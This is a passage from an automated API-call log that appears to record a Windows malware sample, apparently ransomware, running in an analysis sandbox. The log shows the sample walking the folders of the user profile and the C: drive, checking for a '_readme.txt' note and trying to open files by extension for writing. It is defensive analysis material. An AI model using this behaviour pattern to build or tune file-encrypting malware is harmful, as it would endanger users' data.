ftLastAccessTime.dwHighDateTime=0x1d5dd55, ftLastWriteTime.dwLowDateTime=0xa0f3ab60, ftLastWriteTime.dwHighDateTime=0x1d5dd55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.216] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.216] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b970 [0143.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.216] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QD4HLV\\") returned="QD4HLV\\" [0143.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d010 [0143.216] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0143.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.216] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.216] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.216] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.216] PathFindFileNameW (pszPath="") returned="" [0143.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b970 [0143.216] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\QD4HLV\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc5abef90, ftCreationTime.dwHighDateTime=0x1d5e051, ftLastAccessTime.dwLowDateTime=0x46a4db40, ftLastAccessTime.dwHighDateTime=0x1d5e19a, ftLastWriteTime.dwLowDateTime=0x46a4db40, ftLastWriteTime.dwHighDateTime=0x1d5e19a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.217] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.217] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XxpMGUtHr3G-\\") returned="XxpMGUtHr3G-\\" [0143.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d010 [0143.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0143.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.217] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.217] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.217] PathFindFileNameW (pszPath="") returned="" [0143.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.217] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XxpMGUtHr3G-\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd582f7e0, ftCreationTime.dwHighDateTime=0x1d5e567, ftLastAccessTime.dwLowDateTime=0x2d8d3800, ftLastAccessTime.dwHighDateTime=0x1d5e7ee, ftLastWriteTime.dwLowDateTime=0x2d8d3800, ftLastWriteTime.dwHighDateTime=0x1d5e7ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.217] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.218] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.218] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.218] PathFindFileNameW (pszPath="") returned="" [0143.218] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0143.218] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0143.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3290eb8 [0143.218] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3290eb8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0143.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aafb40 [0143.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0143.218] FreeLibrary (hLibModule=0x759d0000) returned 1 [0143.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0143.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x806) returned 0x3290eb8 [0143.219] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0143.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aafb40 [0143.219] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0143.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3290eb8 | out: hHeap=0x620000) returned 1 [0143.219] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x3275b30 [0143.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272548 [0143.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x9ac1a28 [0143.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272510 [0143.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272548 | out: hHeap=0x620000) returned 1 [0143.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.219] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc89f6490, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc89f6490, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0143.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1820 [0143.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1c58 [0143.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x3275b70 [0143.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272510 | out: hHeap=0x620000) returned 1 [0143.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1c58 | out: hHeap=0x620000) returned 1 [0143.219] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1820 | out: hHeap=0x620000) returned 1 [0143.219] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0143.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1820 [0143.219] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0143.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1820 | out: hHeap=0x620000) returned 1 [0143.220] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0143.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1820 [0143.220] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0143.220] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0143.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1820 | out: hHeap=0x620000) returned 1 [0143.220] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc8a1c5f0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a1c5f0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0143.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1820 [0143.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1c58 [0143.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x9ac3460 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272510 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac15a0 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3275b70 | out: hHeap=0x620000) returned 1 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1c58 | out: hHeap=0x620000) returned 1 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1820 | out: hHeap=0x620000) returned 1 [0143.221] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fe8 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281110 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1820 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1c58 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272510 | out: hHeap=0x620000) returned 1 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac15a0 | out: hHeap=0x620000) returned 1 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac3460 | out: hHeap=0x620000) returned 1 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283bf8 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fa0 | out: hHeap=0x620000) returned 1 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fe8 | out: hHeap=0x620000) returned 1 [0143.221] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.221] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.221] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac15a0 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x3203a90 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272510 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1de8 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17f8 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fe8 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1820 | out: hHeap=0x620000) returned 1 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1c58 | out: hHeap=0x620000) returned 1 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283bf8 | out: hHeap=0x620000) returned 1 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3281110 | out: hHeap=0x620000) returned 1 [0143.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1c58 [0143.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac15a0 | out: hHeap=0x620000) returned 1 [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.222] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.222] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.222] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac15a0 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1820 [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac15a0 | out: hHeap=0x620000) returned 1 [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0143.222] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd84a200, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xfd84a200, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272548 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x3282668 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724d8 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac15a0 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283bf8 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1e88 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17a8 [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272510 | out: hHeap=0x620000) returned 1 [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1de8 | out: hHeap=0x620000) returned 1 [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac17f8 | out: hHeap=0x620000) returned 1 [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fe8 | out: hHeap=0x620000) returned 1 [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1c58 | out: hHeap=0x620000) returned 1 [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1820 | out: hHeap=0x620000) returned 1 [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3203a90 | out: hHeap=0x620000) returned 1 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272510 [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272548 | out: hHeap=0x620000) returned 1 [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.222] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272548 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32723f8 [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3272548 | out: hHeap=0x620000) returned 1 [0143.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0143.222] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xc70d1c30, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc70d1c30, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1820 [0143.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1c58 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac17f8 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1c58 | out: hHeap=0x620000) returned 1 [0143.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1820 | out: hHeap=0x620000) returned 1 [0143.223] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1820 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1c58 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x3255a48 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1de8 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac15c8 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fe8 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac18c0 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1848 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272548 [0143.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x3272350 [0143.223] RtlAllocateHeap 